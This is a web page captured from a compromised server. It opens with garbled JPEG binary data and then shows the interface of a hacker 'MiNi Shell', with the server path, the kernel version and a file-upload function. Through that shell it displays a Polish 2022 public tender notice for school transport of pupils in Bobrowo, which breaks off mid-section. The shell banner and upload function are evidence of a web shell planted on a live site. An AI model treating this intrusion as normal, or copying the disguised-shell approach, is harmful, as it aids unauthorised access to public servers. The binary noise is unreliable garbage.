JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220321/0009289901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Transport uczniów do ZPE-T w Bobrowie w 2022 roku.- II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZPE-T_Bobrowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 362116430</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bobrowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-520</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94 36 71 463</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">94 36 71 463</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">k.ignacak@zpetbobrowo.dlaedu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.soswbobrowo.edupage.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Transport uczniów do ZPE-T w Bobrowie w 2022 roku.- II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-59b1f37c-a87f-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00092899</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00055530/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Transport uczniów do ZPE-T w Bobrowie w 2022 roku.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami odbywa się drogą elektroniczną na<br/>podstawie art. 63 ust. 2 przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ , Elektronicznej Platformy<br/>Usług Administracji Publicznej (zwanej ePUAP) https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej k.ignacak@zpetbobrowo.dlaedu.pl .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zawarto w cz. XXIII- SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPET.2.2021.KI</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Trasa poniedziałek (rano) i piątek (popołudnie):	Rudki(1)- Jabłonkowo(1)- Mirosławiec(1)- Kalisz Pom.(3)- Drawsko Pom.(1)- Bobrowo- Siemczyno(2)-Czaplinek- Byszkowo(1)- Czaplinek<br/>2.Trasa poniedziałek (rano) i piątek (popołudnie):	Borne Sulinowo(2)- Juchowo(1)-Górki(1)- Białowąs(1)- Tarmno(1)- Polne(1)- Czaplinek- Drawsko Pom.- <br/>3.Trasa poniedziałek (rano) i piątek (popołudnie):	Złocieniec(3)- Drawsko Pom.- <br/>4.Trasy poniedziałek (popołudnie), wtorek (rano i popołudnie), środa (rano i popołudnie), czwartek (rano i popołudnie), piątek (rano):	Siemczyno(2)- Czaplinek- Byszkowo(1)- Czaplinek<br/>5.Trasy poniedziałek (popołudnie), wtorek (rano i popołudnie), środa (rano i popołudnie), czwartek (rano i popołudnie), piątek (rano):	Silnowo(1)-Borne Sulinowo(2)- Łubowo(1)- Czaplinek- Górki(1)- Białowąs(1)- Tarmno(1)- Czaplinek<br/>6.Trasy poniedziałek (popołudnie), wtorek (rano i popołudnie), środa (rano i popołudnie), czwartek (rano i popołudnie), piątek (rano):	Internat Złoc.(21)- Bobrowo- Drawsko Pom<br/>7. Trasa poniedziałek (rano i popołudnie), wtorek (rano i popołudnie), środa (rano i popołudnie), czwartek (rano i popołudnie), piątek (rano i popołudnie)	Świdwin(3)- Drawsko Pom.<br/>8.Trasa piątek (popołudnie):	Bobrowo(7)- Drawsko Pom.- Stargard<br/>9.Trasa poniedziałek (rano i popołudnie), wtorek (rano i popołudnie)	Drawsko Pom.(7)- Złocieniec- Czaplinek<br/>10.Trasa W T Z- od poniedziałku do piatku (rano i popołudnie):	Darskowo(2)- Złocieniec(1)- Budowo(1)- Czaplinek<br/>11.Trasa poniedziałek 9rano) i piątek( popołudnie)	Łobez(1)- Drawsko Pom.<br/>12.Trasa poniedziałek(popołudnie), wtorek(rano, popołudnie), środa (rano, popołudnie), czwartek(rano, popołudnie), piątek (rano)	Drawsko ul. Połczyńska(7)- Drawsko ul. Seminaryjna 2(6)- Drawsko ul. Złocieniecka 25(1)<br/>13.Trasa czwartek popołudniu	Drawsko(2)- Linowno<br/>14.Trasa 25+- od poniedziałku do piatku (rano i popołudnie):	Drawsko Pom.- Woliczno(1)<br/>15. Trasa 25+- od poniedziałku do piatku (rano i popołudnie)::	&#34;Płocie(1)- Kolno(1)- Złocieniec- Drawsko Pom.- Gudowo(1)- Suliszewo(1)- Złocieniec(1)- Bobrowo </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-11 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Przedmiotem niniejszych zamówień będą usługi tożsame z wymienionymi wopisie przedmiotu zamówienia tj. polegające na usłudze dowozu dzieci do szkół.<br/>2. Wartość zamówień nie przekroczy 30 % wartości zamówienia podstawowego<br/>3. Zamówienia będą mogły zostać udzielone na następujących warunkach:<br/>1) zostaną udzielone w okresie 3 lat od dnia udzielenia zamówienia podstawowego,<br/>2) zamówienia muszą być zgodne z przedmiotem zamówienia podstawowego,<br/>3) zamówienia zostaną udzielone po dokonaniu negocjacji z wykonawcą na podstawie odrębnie zawartej umowy/zlecenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XVI. OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE<br/>OFERTY, WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT 16.1.<br/>Wszystkie oferty nie podlegające odrzuceniu oceniane będą na podstawie następujących kryteriów :<br/>1) Cena (C) – waga kryterium 60% (60pkt); 2) Czas podstawienia pojazdu zastępczego (Cz)– waga<br/>kryterium 40% (40pkt). 16.2. Zasady oceny ofert w poszczególnych kryteriach: 1) Cena (C) – waga<br/>60% cena najniższa brutto*<br/>C =------------------------------------------------ x 100 pkt x 60% cena oferty ocenianej brutto * spośród<br/>wszystkich złożonych ofert niepodlegających odrzuceniua) Podstawą przyznania punktów w kryterium<br/>„cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym – Załącznik nr<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1. b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z<br/>realizacją przedmiotu zamówienia.<br/>2) Czas podstawienia pojazdu zastępczego (Cz) – waga 40% najkrótszy czas<br/>Cz =------------------------------------------------ x 100 pkt x 40% czas oferty ocenianej<br/>16.3. Zaoferowany czas podstawienia pojazdu zastępczego nie może być dłuższy niż 60 minut.<br/>16.4. W przypadku podania przez Wykonawcę czasu dłuższego niż 60 minut Zamawiający uzna ofertę<br/>jako nie zgodną z SWZ. W przypadku nie wpisania przez Wykonawcę czasu w formularzu ofertowym,<br/>Zamawiający przyjmie do oceny maksymalny czas podstawienia pojazdu zastępczego tj. 60 minut.<br/>16.5. W przypadku podania przez Wykonawcę czasu krótszego niż 30 minut, do oceny ofert zostanie<br/>przyjęta punktacja maksymalnej wysokości 40 pkt.<br/>16.5.a. Podstawą przyznania punktów w kryterium „czas podstawienia pojazdu zastępczego” będzie<br/>czas podany przez Wykonawcę w Formularzu Ofertowym – Załącznik nr 1, z uwzględnię zapisów w:<br/>pkt. 16.3., 16.4., i 16.5.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Wyjazdy wewnętrzne- hydroterapia (raz w miesiącu) Bobrowo- Świdwin- Bobrowo <br/>2.Wyjazdy wewnętrzne- hipoterapia (raz w tygodniu) Czaplinek- Zarańsko- Czaplinek <br/>3.Wyjazdy wewnętrzne- hipoterapia (trzy razy w tygodniu) Drawsko- Zarańsko- Drawsko <br/>4.Wyjazdy wewnętrzne- hydroterapia (raz w tygodniu) Czaplinek- Szczecinek- Czaplinek <br/>5.Wyjazdy wewnętrzne- hydroterapia (dwa razy w tygodniu) Drawsko- Świdwin- Drawsko <br/>6. Wyjazdy wewnętrzne - Drawsko ul. Złocieniecka 25- Drawsko <br/>ul. Seminaryjna 2- Drawsko ul. Złocieniecka </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-11 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214<br/>ust. 1 pkt 7 ustawy Pzp. Przedmiotem niniejszych zamówień będą usługi tożsame z wymienionymi<br/>wopisie przedmiotu zamówienia tj. polegające na usłudze dowozu dzieci do szkół.<br/>2. Wartość zamówień nie przekroczy 30 % wartości zamówienia podstawowego<br/>3. Zamówienia będą mogły zostać udzielone na następujących warunkach:<br/>1) zostaną udzielone w okresie 3 lat od dnia udzielenia zamówienia podstawowego,<br/>2) zamówienia muszą być zgodne z przedmiotem zamówienia podstawowego,<br/>3) zamówienia zostaną udzielone po dokonaniu negocjacji z wykonawcą na podstawie odrębnie<br/>zawartej umowy/zlecenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XVI. OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE<br/>OFERTY, WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT 16.1.<br/>Wszystkie oferty nie podlegające odrzuceniu oceniane będą na podstawie następujących kryteriów :<br/>1) Cena (C) – waga kryterium 60% (60pkt); 2) Czas podstawienia pojazdu zastępczego (Cz)– waga<br/>kryterium 40% (40pkt). 16.2. Zasady oceny ofert w poszczególnych kryteriach: 1) Cena (C) – waga<br/>80% cena najniższa brutto*<br/>C =------------------------------------------------ x 100 pkt x 60% cena oferty ocenianej brutto * spośród<br/>wszystkich złożonych ofert niepodlegających odrzuceniua) Podstawą przyznania punktów w kryterium<br/>„cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym – Załącznik nr<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1. b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z<br/>realizacją przedmiotu zamówienia.<br/>2) Czas podstawienia pojazdu zastępczego (Cz) – waga 40% najkrótszy czas<br/>Cz =------------------------------------------------ x 100 pkt x 40% czas oferty ocenianej<br/>16.3. Zaoferowany czas podstawienia pojazdu zastępczego nie może być dłuższy niż 60 minut.<br/>16.4. W przypadku podania przez Wykonawcę czasu dłuższego niż 60 minut Zamawiający uzna ofertę<br/>jako nie zgodną z SWZ. W przypadku nie wpisania przez Wykonawcę czasu w formularzu ofertowym,<br/>Zamawiający przyjmie do oceny maksymalny czas podstawienia pojazdu zastępczego tj. 60 minut.<br/>16.5. W przypadku podania przez Wykonawcę czasu krótszego niż 30 minut, do oceny ofert zostanie<br/>przyjęta punktacja maksymalnej wysokości 40 pkt.<br/>16.5.a. Podstawą przyznania punktów w kryterium „czas podstawienia pojazdu zastępczego” będzie<br/>czas podany przez Wykonawcę w Formularzu Ofertowym – Załącznik nr 1, z uwzględnię zapisów w:<br/>pkt. 16.3., 16.4., i 16.5.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstwienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale VI SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>5.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Warunek zostanie spełniony jeżeli Wykonawca posiada zezwolenie/licencję na wykonywanie transportu drogowego na podstawie art. 5 ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U.2021. poz. 919 ze. zm.). <br/>3) sytuacji ekonomicznej lub finansowej: <br/>Wykonawca musi posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - minimalna kwota ubezpieczenia nie niższą niż 300 000,00 PLN (słownie: trzysta tysięcy złotych 00/100 ) na jedno i na wszystkie zdarzenia.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że w ostatnich 3 latach zrealizował co najmniej jedno świadczenie polegające na wykonaniu usługi transportu w ramach przewozów osób niepełnosprawnych o wartości minimum 50 000,00 PLN brutto (słownie: pięćdziesiąt tysięcy złotych 00/100 ) każde.<br/>b) Wykonawca musi posiadać potencjał techniczny, który pozwoli na prawidłowe wykonanie zamówienia, to znaczy Wykonawca musi wykazać, że dysponuje lub będzie dysponować minimum 2 pojazdami - jeden o liczbie co najmniej 12 miejsc siedzących, a drugi o liczbie co najmniej 8 miejsc siedzących . Używane pojazdy są wyprodukowane w roku 2002 i latach następnych (2003-2021).<br/>c) Wykonawca musi wykazać, że dysponuje lub będzie dysponować odpowiednio wykwalifikowanym personelem, tzn. kierowcami posiadającymi prawo jazdy kategorii D -zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym, w liczbie odpowiadającej ilości pojazdów przeznaczonych przez Wykonawcę do realizacji zamówienia wraz z opiekunami w tych pojazdach (w stosunku do tych osób obowiązuje sprawdzenie czy nie widnieją w rejestrze sprawców przestępstw na tle seksualnym).<br/>d) Kierowcy i opiekunowie posiadają ważne zaświadczenie o ukończonym kursie BHP i udzielania pierwszej pomoc przedmedycznej (p.p.p.) – ważne w dniu podpisani umowy.<br/>5.3. Ocena spełniania 